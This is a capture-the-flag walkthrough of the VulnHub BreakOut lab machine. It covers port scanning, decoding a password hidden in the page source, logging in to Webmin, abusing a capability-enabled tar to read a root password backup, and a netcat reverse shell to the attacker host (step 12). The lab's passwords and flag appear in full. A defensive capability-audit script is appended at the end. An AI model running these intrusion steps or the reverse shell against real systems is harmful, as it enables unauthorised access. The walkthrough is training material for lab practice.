

24/10/2024 Shad Hussain
CTF Walk Through - BreakOut - VulnHub

Machine Link : https://www.vulnhub.com/entry/empire-breakout,751/

step1 : arp-scan -l --- to get the IP

step2 : nmap -T4 -sSV -p- 192.168.0.188 -Pn -A
FINDING
80/tcp open http Apache httpd 2.4.51 ((Debian))
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
20000/tcp open http MiniServ 1.830 (Webmin httpd)

step3 : enum4linux -a 192.168.0.188
FINDING
S-1-22-1-1000 Unix User\cyber (Local User) ---- the user name is cyber

step4 : Open the IP in a browser and view the page source
FINDING
++++++++++[+++++++++++++++++++++-]++++++++++++++++. ++++.+++++++++++++++++.----.++++++++++.-----------.-----------.++++.+.-.--------. ++++++++++++++++++++.------------.---------.++++++.++++++.
It is a brainfuck cipher and can be decoded at https://www.dcode.fr/brainfuck-language
The password is ".2uqPEfj3DPa-3"

step5 : Open http://192.168.0.188:10000/ and log in with user id: cyber and pwd: .2uqPEfj3DPa-3

step6 : At the bottom of the blue menu on the left you will get the shell; click it and open it

step7 : ls -la -- you will find a tar file
getcap -r / 2>/dev/null -- to know the capability of the tar file

step8 : ls -la /var/backups
FINDING
.old_pass.bak

step9 : ./tar -cf pass.tar /var/backups/.old_pass.bak

step10 : ./tar -xf pass.tar

step11 : on the attacker terminal, open a shell with nc -nvlp 4444

step12 : on the victim terminal, run nc 192.168.0.106 4444 -e /bin/bash -- and hit enter

step13 : ls, then cat pass.tar -- you will get the password for root
Ts&4&YurgtRX(=~h

step14 : su root and type the password

step15 : whoami -- you will be root; then cd root, then ls -- you will find rOOt.txt; then less rOOt.txt (cat may not work)
FINDING
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Author: Icex64 & Empire Cybersecurity
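Defender's view of steps 7 to 10, as an added example that is not part of the original walkthrough: the same getcap listing can be filtered to find binaries whose file capabilities bypass permission checks, or that carry capabilities while sitting in a home or temp directory. The page does not name the capability set on tar; cap_dac_read_search and cap_dac_override are the standard Linux read/write bypass capabilities, and the sample lines (including the path /home/cyber/tar) are constructed.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit file capabilities.
# Usage on a live host:  getcap -r / 2>/dev/null | flag_risky_caps

# Real Linux capabilities that bypass file permission (DAC) checks.
RISKY_CAPS='cap_dac_read_search|cap_dac_override'

# Constructed sample of getcap output; paths are assumptions, not from the page.
sample_getcap_output() {
    cat <<'EOF'
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/oldtool = cap_dac_override+ep
EOF
}

# Reads getcap lines on stdin; prints "path<TAB>caps<TAB>reason" for each finding.
flag_risky_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        caps=${line##* }     # last field: the capability set
        path=${line% *}      # everything before it
        path=${path% =}      # older libcap prints "path = caps"
        reason=''
        if printf '%s\n' "$caps" | grep -Eq "$RISKY_CAPS"; then
            reason='permission-bypass capability'
        fi
        case $path in
            /home/*|/tmp/*|/var/tmp/*|/dev/shm/*)
                reason="${reason:+$reason; }binary in home or temp directory" ;;
        esac
        if [ -n "$reason" ]; then
            printf '%s\t%s\t%s\n' "$path" "$caps" "$reason"
        fi
    done
    return 0
}
```

A finding can be cleared with setcap -r on the reported path once the capability is confirmed to be unneeded.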
